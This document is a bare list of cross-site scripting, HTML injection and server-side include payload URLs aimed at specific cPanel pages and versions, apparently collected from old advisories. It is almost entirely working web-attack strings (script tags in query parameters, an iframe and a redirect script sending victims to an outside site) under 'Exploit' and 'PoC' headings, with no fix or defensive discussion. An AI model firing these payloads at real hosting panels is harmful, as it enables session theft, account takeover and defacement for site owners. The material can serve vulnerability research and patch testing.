http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS 
http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS 
http://target:2082/frontend/x/files/createdir.html?dir=XSS 
http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss 
http://target:2082/frontend/x/err/erredit.html?dir=XSS 
http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS 
http://target:2082/frontend/x/files/createfile.html?dir=XSS

Systems Affected: cPanel 9.1.0-R85

To check cPanel for CSS, simply access the following example URLs in a browser: 
http://[victim]/frontend/x/cpanelpro/ignorelist.
html?account="><script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/cpanelpro/showlog.
html?account=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/sql/repairdb.
html?db=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/ftp/doaddftp.
html?login="><script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/cpanelpro/editmsg.
html?account="><script>alert('Vulnerable')</script> 
http://[victim]/frontend/x/testfile.
html?email=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x2/err/erredit.
html?dir=public_html/&file=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='s="fixed">http://www.cirt.net/'</script> 
http://[victim]/frontend/x2/denyip/del.
html?ip=<script>alert('Vulnerable')</script> 
http://[victim]/frontend/x2/htaccess/index.
html?dir=<script>alert('Vulnerable')</script>

cPanel 10.9.1 XSS 

/frontend/x/htaccess/changepro.html?protected=1&resname=XSS_GOES_HERE 
(click on Go Back...)

Exploit & Examples: 

Exploit: 
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1> 

Javascript: 
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');"> 

Server Side Inclusion 
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" --> 

HTML 
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">

http://target:2082/mail/pops.html?domain=XSS

Affected scripts with proof of concept exploit: 

http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.
html?email= <script>alert('vul')</script>&domain= 

http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.
html?email= <script>alert('vul')</script>&domain=xxx 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.
html?showtree=0 "><script>alert('vul')</script> 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006&domain=xxx&target= "><script>alert('vul')</script> 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006&domain=xxx "><script>alert('vul')</script>&target=xxx 

http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006 "><script>alert('vul')</script>&domain=xx
x&target=xxx 
 
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan "><script>alert('vul')</script>&year=2006
&domain=xxx&target=xxx

CPanel file Manager: 
PoC: 
http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS] 

CPanel Password Protect DIRS: 
PoC: 
http://target.com:2082/frontend/[servername]/htaccess/newuser.
html?user=[XSS]&pass=&dir=A VALID FOLDER 
*Press Go Back (hyperlink) 

In Password Protected DIR: 
PoC: 
http://www.target:2082/frontend/[servername]/htaccess/newuser.
html?user=[XSS]&pass=&dir=[XSS]

http://(domain):
2086/scripts/passwd?password=<>&domain=<>&user=<>